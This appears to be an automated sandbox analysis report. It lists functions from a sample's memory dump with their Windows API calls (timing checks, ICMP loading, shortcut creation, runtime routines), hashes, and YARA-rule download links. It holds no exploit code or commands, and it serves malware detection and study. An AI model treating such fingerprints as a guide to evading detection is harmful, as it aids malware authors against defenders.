Instruction ID: 5bfb2dd85353ce8eb40659b8192b0173b93260deaaafc0678eb6c3e9424f33dd
Opcode Fuzzy Hash: dd60e6b499d2ec3a906c5f00c4a4d5cc09f7d7e7129de433f33f75e5b3627fa3
Instruction Fuzzy Hash: 83218375C05319ABC730DF69E844AABBBACEF08320F108117FE94D3299D3399845DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4569, Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FE457F
QueryPerformanceCounter.KERNEL32(?), ref: 00FE459C
Sleep.KERNEL32(00000000), ref: 00FE45BB
QueryPerformanceCounter.KERNEL32(?), ref: 00FE45C5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 09acc48887abe4dbfc5f2f1089daa0c6195e7c3c6ebd3fc964bc4053e6f133e5
Instruction ID: 96f9206da97465dcaf64f84a0742c1264565428f2e49d7220c1921ac86535d5c
Opcode Fuzzy Hash: 09acc48887abe4dbfc5f2f1089daa0c6195e7c3c6ebd3fc964bc4053e6f133e5
Instruction Fuzzy Hash: 11119032D0022CD7CF109F99E944AEEBB78FF99321F04415AEA40B2240CB31A5619BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01005562, Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001101,00000000,?), ref: 01005571
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteDestroyObject$IconMessageSendWindow
String ID:
API String ID: 1489400265-0
Opcode ID: 9abde9da332f75eec5d49cba540c051f5e9b566e234d237598cc7a9355dfb953
Instruction ID: 55677305dca454ad77feef5daf4ad4200e89b0c78fc1fcd6a7ce21c252d60d78
Opcode Fuzzy Hash: 9abde9da332f75eec5d49cba540c051f5e9b566e234d237598cc7a9355dfb953
Instruction Fuzzy Hash: 9F011A70300201ABEB21DE29EDC8A2677ADBB48611F004694FE81DB289C735D8458F64

Uniqueness

Uniqueness Score: -1.00%

Function 0100557C, Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FDFF70: InvalidateRect.USER32(?,00000000,00000001), ref: 00FDFFFE

DestroyWindow.USER32 ref: 0100569D
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
String ID:
API String ID: 1042038666-0
Opcode ID: a088b59c680167877679fce78b59b4bcb0245621940e8b98f0b28c72dceefa70
Instruction ID: 99959d65e4440b8e8f8a9d2b0f6bf8bb598ec84554d4dd63d0c4c7cc072f4c78
Opcode Fuzzy Hash: a088b59c680167877679fce78b59b4bcb0245621940e8b98f0b28c72dceefa70
Instruction Fuzzy Hash: B401FB742052019BEB22EF69ECC892A77BDBF48251B004664F981CB289D735D8458F75

Uniqueness

Uniqueness Score: -1.00%

Function 00FC50CF, Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC1810: _doexit.LIBCMT ref: 00FC181C

___set_flsgetvalue.LIBCMT ref: 00FC50E0

Part of subcall function 00FC77D1: TlsGetValue.KERNEL32 ref: 00FC77DA
Part of subcall function 00FC77D1: TlsSetValue.KERNEL32(00000000,?,00FC12DC,?,00000001), ref: 00FC77FB

___fls_getvalue@4.LIBCMT ref: 00FC50EB

Part of subcall function 00FC77B1: TlsGetValue.KERNEL32 ref: 00FC77BF

___fls_setvalue@8.LIBCMT ref: 00FC50FD
GetLastError.KERNEL32(00000000,?,00000000), ref: 00FC5106
ExitThread.KERNEL32 ref: 00FC510D
__freefls@4.LIBCMT ref: 00FC5129

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 4247068974-0
Opcode ID: d80874879918a60afdd980e95c358732111579ad3f12bed668f814ec00e69e61
Instruction ID: a9fec267989e6084ecba0d983c0619dacd078c232a83cd9a69c57091111f79d5
Opcode Fuzzy Hash: d80874879918a60afdd980e95c358732111579ad3f12bed668f814ec00e69e61
Instruction Fuzzy Hash: 20E0EC35D0830B6BDF1037B19F1FF5E3A6D9E04B50B204818BA1192057EA2DD861BA61

Uniqueness

Uniqueness Score: -1.00%

Function 00FFF37B, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON

Download Yara Rule

Strings

\, xrefs: 00FFCFD7
U, xrefs: 00FFFAFE
), xrefs: 00FFF37F

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: )$U$\
API String ID: 0-3705770531
Opcode ID: c68029cae425aefc41b50dfe755164703bc0d0cfbfb24c12fd72fc916b056c60
Instruction ID: 54739650ea3752d7a7d20fed1a8a41231a1ab87fad9091f59d880ba60ded9c4b
Opcode Fuzzy Hash: c68029cae425aefc41b50dfe755164703bc0d0cfbfb24c12fd72fc916b056c60
Instruction Fuzzy Hash: ECC1EF70E0420DCFDB24CF69C5806BDBBF2FF89314F2881AAD55697264D7319946EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FFE0FF, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFE976

Strings

\, xrefs: 00FFCFD7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: ac3bad38873644568df4ac32c1a0680b53b0d11aaff513531ae284b7c8d29ffb
Instruction ID: d860e4030f0c6ce756eee13a260da7e64518a63f8340274ceb4a20061d62e53c
Opcode Fuzzy Hash: ac3bad38873644568df4ac32c1a0680b53b0d11aaff513531ae284b7c8d29ffb
Instruction Fuzzy Hash: 38B1CB71D0424DCFCB25CFA8C8907BDBBB2AF45314F2881A9D251AB3B1D3785942EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FFE0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFE976

Strings

\, xrefs: 00FFCFD7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 80893a7e5865a13b7b9508cf9904806478cddeca26e577541b5ee18bde103dd9
Instruction ID: 2f27ed7dcb7c027ff00b8200d0ce86f8990d05b9aa4cda99a9a842d8c874e488
Opcode Fuzzy Hash: 80893a7e5865a13b7b9508cf9904806478cddeca26e577541b5ee18bde103dd9
Instruction Fuzzy Hash: 1EB1CB71D0424DCFCB25CFA8C8907BDBBB2AF45314F2881A9D251AB3B1D3785942EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FFE10F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFE976

Strings

\, xrefs: 00FFCFD7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 6684cada718094160b943f0081d89044dd8ac7f9e9f28afd57dd275d1c5a0076
Instruction ID: 66c6cfb8d738d5c1d582c2c93dd62d62fa2f93e4c02b2a4b4591fdbcd004009c
Opcode Fuzzy Hash: 6684cada718094160b943f0081d89044dd8ac7f9e9f28afd57dd275d1c5a0076
Instruction Fuzzy Hash: 71A1CC71D0424CCFDB15CFA8C8907BDBBB2AF45304F2881A9D251AB3B1D3785942EB61

Uniqueness

Uniqueness Score: -1.00%

Function 01028357, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF2654: _wcslen.LIBCMT ref: 00FF2680

CoInitialize.OLE32(00000000), ref: 010283FC
CoCreateInstance.OLE32(01032A08,00000000,00000001,010328A8,?), ref: 01028415
CoUninitialize.OLE32 ref: 010285F6

Strings

.lnk, xrefs: 010283A5, 010283B8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 78010016b98af19c0a7f68573ae190af49275c794864d4fad00179420b34d8f8
Instruction ID: 6f4b4f6b9a576ca3602e5dcc3449adf21f563bb7cef533c306be33327dec7ed2
Opcode Fuzzy Hash: 78010016b98af19c0a7f68573ae190af49275c794864d4fad00179420b34d8f8
Instruction Fuzzy Hash: 0E810B71344301AFE210EB54CC82F9A73E9AFC8714F108959F698DB2E1D6B5ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FFF0AD, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFCF87

Strings

\, xrefs: 00FFCFD7
], xrefs: 00FFF0AE
h, xrefs: 00FFF704

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \$]$h
API String ID: 4104443479-3262404753
Opcode ID: 03f9ade20a024513ca8df49aec30e87a138459ba33d8d51d79fe54e6241c4870
Instruction ID: 8a5e1fb98ddbe84a4c1cb75bbc16b8d873bf1289bf2e17a47ef19fcf507ee698
Opcode Fuzzy Hash: 03f9ade20a024513ca8df49aec30e87a138459ba33d8d51d79fe54e6241c4870
Instruction Fuzzy Hash: 9A517C71E0021D8FCF18CF68C990ABDF7B6AF89314F288269E515AB264D7309A45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FE5223, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

CLSIDFromString.OLE32(?,00000000), ref: 00FE5244
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE5293
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE52C2

Strings

crts, xrefs: 00FE52A0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
String ID: crts
API String ID: 943502515-3724388283
Opcode ID: 2c2b1338bc79b17ef9f7353eec8d2145f67afcd816901aa76d57ac5be2fefee2
Instruction ID: e84cdbc1c0bc292066d7ac9ded2b92cd47164529d3efb70a77a23e403abb8c5e
Opcode Fuzzy Hash: 2c2b1338bc79b17ef9f7353eec8d2145f67afcd816901aa76d57ac5be2fefee2
Instruction Fuzzy Hash: F2214A76A006019FC314CF8AE484D96FBE8FF99761704C42AEA49CB721D334E851DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA0D5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

VariantInit.OLEAUT32(00000000), ref: 00FDA0E0
VariantCopy.OLEAUT32(00000000), ref: 00FDA0EC
VariantClear.OLEAUT32 ref: 00FDA0FD

Strings

H/n, xrefs: 00FBA08C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_malloc
String ID: H/n
API String ID: 2981388473-970879320
Opcode ID: 04b706d1aa8ed3f2550fb92b2f98d427acf3db50af098b35a2b7ee31e46433e1
Instruction ID: f965730001abf93a53e3e3e0844401b36fd4a8c7b4350ae819507e8ce4383595
Opcode Fuzzy Hash: 04b706d1aa8ed3f2550fb92b2f98d427acf3db50af098b35a2b7ee31e46433e1
Instruction Fuzzy Hash: 8D215CB2A04341CFC720DF26D880A56B7E6BF98754F28495AE895C7314E736D890EF53

Uniqueness

Uniqueness Score: -1.00%

Function 00FE11F9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00FE120B
GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 00FE121D

Strings

IcmpSendEcho, xrefs: 00FE1217
ICMP.DLL, xrefs: 00FE1206

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpSendEcho
API String ID: 2574300362-58917771
Opcode ID: b48bf11c622f659d3656ccf71ccd52eadfec168f075d9414f38485a7cbf531fe
Instruction ID: c1908610456eb9196db38934ba98de094bd695f4bf9dbab8cf8e24f3e4441773
Opcode Fuzzy Hash: b48bf11c622f659d3656ccf71ccd52eadfec168f075d9414f38485a7cbf531fe
Instruction Fuzzy Hash: 85E012719003569BD7305F97E8046467BDCEB54761B00C429ED95D6500D775E490C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00FE125D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00FE126F
GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00FE1281

Strings

IcmpCreateFile, xrefs: 00FE127B
ICMP.DLL, xrefs: 00FE126A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCreateFile
API String ID: 2574300362-275556492
Opcode ID: 65c9f713929be425869f33400d386089b30d3457cafb8ef8afe94de60cda14b7
Instruction ID: 98dcfe35e6f35c3289e83c1eb713b356c9410fa6a364cefb1d3ee27fe14b1f58
Opcode Fuzzy Hash: 65c9f713929be425869f33400d386089b30d3457cafb8ef8afe94de60cda14b7
Instruction Fuzzy Hash: 65E012719003169FD7205F57DC0464677DCFB54761B10C429E9C5D6500DB75E4909BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FE122B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00FE123D
GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 00FE124F

Strings

IcmpCloseHandle, xrefs: 00FE1249
ICMP.DLL, xrefs: 00FE1238

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCloseHandle
API String ID: 2574300362-3530519716
Opcode ID: 420d9f880bc16b4161fbfdb9a46f0346dff9ed9ed8b0afc8300fccc649aa127e
Instruction ID: 87a2471f82de014b9eb2b17593e71a91e9630c2b07141f28d434b8b5b6f2e4ac
Opcode Fuzzy Hash: 420d9f880bc16b4161fbfdb9a46f0346dff9ed9ed8b0afc8300fccc649aa127e
Instruction Fuzzy Hash: 8CE012719403569BD7205F57E84864677DCEF50761B00C429EA85D6500D7B5E49087A5

Uniqueness

Uniqueness Score: -1.00%

Function 0102812C, Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

SetErrorMode.KERNEL32 ref: 01028188
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 01028341

Part of subcall function 00FE397D: GetFileAttributesW.KERNEL32(?), ref: 00FE3984

SetErrorMode.KERNEL32(?), ref: 0102822A
SetErrorMode.KERNEL32(?), ref: 010282FA

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$AttributesFile_memmove_wcslen
String ID:
API String ID: 3884216118-0
Opcode ID: c3955462eb6682c814e5340e08216312598df7f9c84e17e2b3f03ae8a0a98879
Instruction ID: eb457eddceb918b2ab079be32e9d0b21b492b9bb37d6218184cf4b9bf550992b
Opcode Fuzzy Hash: c3955462eb6682c814e5340e08216312598df7f9c84e17e2b3f03ae8a0a98879
Instruction Fuzzy Hash: 44617A716083419FD310EF29C881A9BBBE4BF89714F04895EFAC95B391C776E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 010294BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 010294C9
SysAllocString.OLEAUT32(00000000), ref: 01029592
VariantCopy.OLEAUT32(?,?), ref: 010295C9
VariantClear.OLEAUT32(?), ref: 0102960A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: dc93e06a877b00e1ac22df78caf76d2aca7f6ea4848d75eabb8dee4997649928
Instruction ID: 93c02f091478ce30c05d13dadfc24d9482e7eaafbf9f98e187ecb95d89f2f3f6
Opcode Fuzzy Hash: dc93e06a877b00e1ac22df78caf76d2aca7f6ea4848d75eabb8dee4997649928
Instruction Fuzzy Hash: 7151F63520021A9ACB10FF2ADC855EDB7A8FF88355F408526FE48C7241DB75DA19D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00FC407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FC411A
__flush.LIBCMT ref: 00FC4138
__write.LIBCMT ref: 00FC415F
__flsbuf.LIBCMT ref: 00FC418A

Part of subcall function 00FC7E9A: __getptd_noexit.LIBCMT ref: 00FC7E9A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
Instruction ID: 98f4fceb61d4c89241bcb1b3080d7d93e98cbab1a571288ed0dabf693becce08
Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
Instruction Fuzzy Hash: DC410632E407069BDB25CF658A62F5EBBB5AF90370F28812CD45597540D770FE80EB40

Uniqueness

Uniqueness Score: -1.00%

